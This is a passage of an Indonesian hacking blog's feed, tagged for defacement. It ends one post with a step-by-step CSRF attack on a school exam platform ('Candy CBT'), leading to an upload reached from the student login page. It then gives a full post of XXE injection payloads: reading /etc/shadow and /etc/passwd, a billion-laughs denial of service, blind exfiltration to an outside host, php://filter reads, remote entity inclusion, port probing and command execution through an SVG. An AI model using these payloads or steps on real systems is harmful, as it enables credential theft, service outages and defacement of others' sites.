&lt;li&gt;Nah Kita Ke Csrfnya Terserah Kalian Mau Pakai Yang Mana Online Atau Yang Saya Bagi Di Atas Itu Terserah Kalian..&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL-s1dZx2uetLaSEb5mhnHDpn7rrqVmUzJyj1k5G7rOdScpFQiz2iWt-dpEpeAlJ2_Dm-EDsoBR4Z6BM0lH7KmBiD32zDQ2GPSS-I1Sra4cqHV-IHIzqg6y2FZT_zpz8GKdIjyjFIo1HW-/s1600/S00518-012932.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL-s1dZx2uetLaSEb5mhnHDpn7rrqVmUzJyj1k5G7rOdScpFQiz2iWt-dpEpeAlJ2_Dm-EDsoBR4Z6BM0lH7KmBiD32zDQ2GPSS-I1Sra4cqHV-IHIzqg6y2FZT_zpz8GKdIjyjFIo1HW-/s320/S00518-012932.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Jika Menggunakan Csrf Online Postfilenya logo&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9_i3lwsjdxSuqr9waXtzYNiuiq7Zx1cgGEPkghBtkKmL0_XaK4JrVPzZMCRI0D9-eyw4SUtu92JYL41tFr49NAFFy8FeSmuDpoHsdKiQWJ5GYgR0M8tE0nBjVncutnJNNAOZVl7wweTxM/s1600/S00518-013129.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9_i3lwsjdxSuqr9waXtzYNiuiq7Zx1cgGEPkghBtkKmL0_XaK4JrVPzZMCRI0D9-eyw4SUtu92JYL41tFr49NAFFy8FeSmuDpoHsdKiQWJ5GYgR0M8tE0nBjVncutnJNNAOZVl7wweTxM/s320/S00518-013129.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Jika Menggunkan Csrf Yang Saya Buat Kalian Tinggal Masukan Target Saja&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;Nah Jika Sudah Selesai Kalian Tinggal Eksekusi Aja Gan&lt;/li&gt;
&lt;/ul&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7WHE8X6ZKMS87IMB1JnUxVTJ5I9OSReMb40TbUvKEWCeB-69b65qJXLM51GnV2u4UkQgqBmb_s-KG5NexRd0FjZeJKkDz_t8E2zV3aET8BpAefaKVDIlnTZsmQjuEbkb6_mRUqolxXq4L/s1600/S00518-013516.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7WHE8X6ZKMS87IMB1JnUxVTJ5I9OSReMb40TbUvKEWCeB-69b65qJXLM51GnV2u4UkQgqBmb_s-KG5NexRd0FjZeJKkDz_t8E2zV3aET8BpAefaKVDIlnTZsmQjuEbkb6_mRUqolxXq4L/s320/S00518-013516.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Nah Jika Success Akan Blank Gan&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;Sekarang Tinggal Balik Lagi Gan Ke Awal Lagi Yaitu Ke Login Page Siswanya Bukan Login Page Adminnya :v&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjho9KmPHR_P3FSPEFFI_gna16vt3-zvtB_iDws9lXKA4L_BwDMK1-MJxZIorvtoFYcckCjsEF18jK07lyj1FTbz2e_1Z_nF4_y5GCRsvkiUmrRzzRudz6cBTGOxYa-Fpyfj5NuYxIrKRtp/s1600/S00518-013733.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjho9KmPHR_P3FSPEFFI_gna16vt3-zvtB_iDws9lXKA4L_BwDMK1-MJxZIorvtoFYcckCjsEF18jK07lyj1FTbz2e_1Z_nF4_y5GCRsvkiUmrRzzRudz6cBTGOxYa-Fpyfj5NuYxIrKRtp/s320/S00518-013733.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Ada Gambar Yang Error Kalian Tekan Gambar Tersebut Gan Lalu Buka Di Tab Yang Baru&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiArDJ8U4m_CkpUkv6z5W6QT5qUpArzYxZB0D4H6I6bnJ3kp5_pIxbvYIavV2OOkKcIgBg49zF29TFw0FotyJezWPkrezpJgUmPdY7i5sGE7HpZxxg_po2NPvqaUiivdd-ovJlHSIIeOC10/s1600/S00518-013900.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiArDJ8U4m_CkpUkv6z5W6QT5qUpArzYxZB0D4H6I6bnJ3kp5_pIxbvYIavV2OOkKcIgBg49zF29TFw0FotyJezWPkrezpJgUmPdY7i5sGE7HpZxxg_po2NPvqaUiivdd-ovJlHSIIeOC10/s320/S00518-013900.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;And Boom&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJEZccoYBNz5qvgX1iZDD662zfHzrAdbWQOsAvi96_tKdKpfBavePe3GteF9tnki0P9ZAxFPycVI5niHDM8WJPuCrshZ2sDxjC0hrxSp6aC-yIPWcc49YNilY8N844FCwh9KOLb5UK5mDL/s1600/S00518-014008.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJEZccoYBNz5qvgX1iZDD662zfHzrAdbWQOsAvi96_tKdKpfBavePe3GteF9tnki0P9ZAxFPycVI5niHDM8WJPuCrshZ2sDxjC0hrxSp6aC-yIPWcc49YNilY8N844FCwh9KOLb5UK5mDL/s320/S00518-014008.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Selesai...&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Happy Hacking Gan..&amp;nbsp;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/6506430547780257974/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/candy-cbt-new-exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6506430547780257974'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6506430547780257974'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/candy-cbt-new-exploit.html' title='Candy Cbt New Exploit'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbtH7fmTWYHe__nnmIcFRXLiwUZgtI6HUhmVOvDJda2LrcBeZgrOZBhcVyVZmenJo30tBuPrJ7sGTbBlrYAqXtYtuaxN9NoC5Fyf-8t7_uPwsL15fTE9ToV2xOB0oE-Mgxjz-ArHhR2AY6/s72-c/IMG-20200510-WA0610.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-2075488152888053492</id><published>2020-05-14T23:32:00.001+07:00</published><updated>2020-05-14T23:32:25.674+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="IT"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>XML External Entity [XEE]</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfgQe-AQFt8ll8QHUmUeQhNOD_ea-Wz17IW_pn9alsHvW_1FT9QmiHvTz3A34ypc5Mt2rFjxIod-ji9ytTyXYkNCL9OJyKrsj9O7SMtAwafphEKtZrrX61ntCl8KBAReItskoG9yTe6b0y/s1600/IMG-20200510-WA0609.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;904&quot; data-original-width=&quot;1280&quot; height=&quot;226&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfgQe-AQFt8ll8QHUmUeQhNOD_ea-Wz17IW_pn9alsHvW_1FT9QmiHvTz3A34ypc5Mt2rFjxIod-ji9ytTyXYkNCL9OJyKrsj9O7SMtAwafphEKtZrrX61ntCl8KBAReItskoG9yTe6b0y/s320/IMG-20200510-WA0609.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hayo Puasa Belum Batal Kan Kalian?? Wkwkw&lt;br /&gt;
&lt;br /&gt;
Di Konten Kali Ini Saya Akan Share Apa Itu&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;u&gt;XML External Entity&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; Atau &lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: red;&quot;&gt;XEE.&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;u&gt;XML External Entity&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; Atau &lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: red;&quot;&gt;XEE&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&amp;nbsp;Adalah Sebuah Jenis Serangan Terhadap Aplikasi Yang Mem-parsing Input Xml. Serangan Ini Terjadi Ketika Input Xml Yang Berisi Referensi Ke Entitas Eksternal Diproses Oleh Parser Xml Yang Dikonfigurasi Dengan Lemah. Serangan Ini Dapat Menyebabkan Pengungkapan Data Rahasia, Penolakan Layanan, Pemalsuan Permintaan Sisi Server, Pemindaian Port Dari Perspektif Mesin Tempat Parser Berada, Dan Dampak Sistem Lainnya.&lt;br /&gt;
&lt;br /&gt;
Standar XML 1.0 mendefinisikan struktur dokumen XML. Standar mendefinisikan konsep yang disebut entitas, yang merupakan unit penyimpanan dari beberapa jenis. Ada beberapa jenis entitas, entitas parsing umum / parameter eksternal sering disingkat menjadi entitas eksternal, yang dapat mengakses konten lokal atau jarak jauh melalui pengidentifikasi sistem yang dinyatakan. Pengidentifikasi sistem diasumsikan sebagai URI yang dapat didereferensiasi (diakses) oleh prosesor XML saat memproses entitas. Prosesor XML kemudian menggantikan kemunculan entitas eksternal bernama dengan konten yang direferensikan oleh pengenal sistem. Jika pengidentifikasi sistem berisi data tercemar dan prosesor XML dereferensi data tercemar ini, prosesor XML dapat mengungkapkan informasi rahasia yang biasanya tidak dapat diakses oleh aplikasi. Vektor serangan yang serupa menerapkan penggunaan DTD eksternal, style sheet eksternal, skema eksternal, dll. Yang, jika disertakan, memungkinkan serangan gaya inklusi sumber daya eksternal yang serupa.&lt;br /&gt;
&lt;br /&gt;
Serangan dapat mencakup pengungkapan file lokal, yang mungkin berisi data sensitif seperti kata sandi atau data pengguna pribadi, menggunakan file: skema atau jalur relatif di pengenal sistem. Karena serangan itu terjadi relatif terhadap aplikasi yang memproses dokumen XML, penyerang dapat menggunakan aplikasi tepercaya ini untuk berporos ke sistem internal lain, mungkin mengungkapkan konten internal lainnya melalui permintaan (http) atau meluncurkan serangan CSRF ke layanan internal yang tidak dilindungi. Dalam beberapa situasi, pustaka prosesor XML yang rentan terhadap masalah korupsi memori sisi klien dapat dieksploitasi dengan mendereferensi URI berbahaya, mungkin memungkinkan eksekusi kode arbitrer di bawah akun aplikasi. Serangan lain dapat mengakses sumber daya lokal yang mungkin tidak menghentikan pengembalian data, mungkin memengaruhi ketersediaan aplikasi jika terlalu banyak utas atau proses tidak dirilis.&lt;br /&gt;
&lt;br /&gt;
Perhatikan bahwa aplikasi tidak perlu mengembalikan respons secara eksplisit kepada penyerang agar rentan terhadap pengungkapan informasi. Penyerang dapat memanfaatkan informasi DNS untuk mengekstrak data melalui nama subdomain ke server DNS di bawah kendali mereka.&lt;br /&gt;
&lt;br /&gt;
Source :&amp;nbsp;&lt;a href=&quot;https://en.m.wikipedia.org/wiki/XML_external_entity_attack&quot; target=&quot;_blank&quot;&gt;Wikipedia&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Faktor Resiko Dari Penyerangan Ini&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;Aplikasi mem-parsing dokumen XML.&lt;/li&gt;
&lt;li&gt;Data tercemar diizinkan di dalam bagian pengenal sistem entitas, dalam deklarasi &lt;a href=&quot;https://www.w3.org/TR/REC-xml/#sec-prolog-dtd&quot; target=&quot;_blank&quot;&gt;tipe dokumen (DTD).&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Prosesor XML dikonfigurasi untuk memvalidasi dan memproses DTD.&lt;/li&gt;
&lt;li&gt;Prosesor XML dikonfigurasi untuk menyelesaikan entitas eksternal dalam DTD.&amp;nbsp;&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;br /&gt;
Beberapa Payload XXE :&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;Contoh :&amp;nbsp;&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;b&gt;&amp;lt;!--?xml version=&quot;1.0&quot; ?--&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;lt;!DOCTYPE replace [&amp;lt;!ENTITY example &quot;Doe&quot;&amp;gt; ]&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;lt;userInfo&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &amp;lt;firstName&amp;gt;John&amp;lt;/firstName&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &amp;lt;lastName&amp;gt;&amp;amp;example;&amp;lt;/lastName&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;lt;/userInfo&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE File Disclosure&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!--?xml version=&quot;1.0&quot; ?--&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE replace [&amp;lt;!ENTITY ent SYSTEM &quot;file:///etc/shadow&quot;&amp;gt; ]&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;userInfo&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;nbsp;&amp;lt;firstName&amp;gt;John&amp;lt;/firstName&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;nbsp;&amp;lt;lastName&amp;gt;&amp;amp;ent;&amp;lt;/lastName&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;/userInfo&amp;gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE DOS (Denial Of Service)&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!--?xml version=&quot;1.0&quot; ?--&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE lolz [&amp;lt;!ENTITY lol &quot;lol&quot;&amp;gt;&amp;lt;!ELEMENT lolz (#PCDATA)&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol1 &quot;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol2 &quot;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol3 &quot;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol4 &quot;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol5 &quot;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol6 &quot;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol7 &quot;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol8 &quot;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY lol9 &quot;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;tag&amp;gt;&amp;amp;lol9;&amp;lt;/tag&amp;gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE Local File Inclusion (LFI)&amp;nbsp;&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;?xml version=&quot;1.0&quot;?&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE foo [&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ELEMENT foo (#ANY)&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE Blind Local File Inclusion&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;?xml version=&quot;1.0&quot;?&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE foo [&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ELEMENT foo (#ANY)&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY % xxe SYSTEM &quot;file:///etc/passwd&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY blind SYSTEM &quot;https://www.example.com/?%xxe;&quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;blind;&amp;lt;/foo&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE Access Control Bypass (Loading Restricted Resources - PHP)&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;?xml version=&quot;1.0&quot;?&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE foo [&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY ac SYSTEM &quot;php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php&quot;&amp;gt;]&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;foo&amp;gt;&amp;lt;result&amp;gt;&amp;amp;ac;&amp;lt;/result&amp;gt;&amp;lt;/foo&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE Remote Attack - Thro&lt;/i&gt;&lt;i&gt;ugh External Xml Inclusion&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;?xml version=&quot;1.0&quot;?&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE lolz [&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!ENTITY test SYSTEM &quot;https://example.com/entity1.xml&quot;&amp;gt;]&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;lolz&amp;gt;&amp;lt;lol&amp;gt;3..2..1...&amp;amp;test&amp;lt;lol&amp;gt;&amp;lt;/lolz&amp;gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;Base64 Encoded&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;!DOCTYPE test [ &amp;lt;!ENTITY % init SYSTEM &quot;data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk&quot;&amp;gt; %init; ]&amp;gt;&amp;lt;foo/&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE inside SOAP&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;soap:Body&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;nbsp; &amp;lt;foo&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;lt;![CDATA[&amp;lt;!DOCTYPE doc [&amp;lt;!ENTITY % dtd SYSTEM &quot;http://x.x.x.x:22/&quot;&amp;gt; %dtd;]&amp;gt;&amp;lt;xxx/&amp;gt;]]&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;nbsp; &amp;lt;/foo&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;/soap:Body&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;XXE inside SVG&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;300&quot; version=&quot;1.1&quot; height=&quot;200&quot;&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;lt;image xlink:href=&quot;expect://ls&quot;&amp;gt;&amp;lt;/image&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&amp;lt;/svg&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
Nah Itulah Tentang XML External Entity Atau XXE..&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Semoga Bermanfaat...&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Refrensi :&lt;/div&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://medium.com/@ismailtasdelen/xml-external-entity-xxe-injection-payload-list-937d33e5e116&quot; target=&quot;_blank&quot;&gt;https://medium.com/@ismailtasdelen/xml-external-entity-xxe-injection-payload-list-937d33e5e116&lt;/a&gt;&lt;/li&gt;
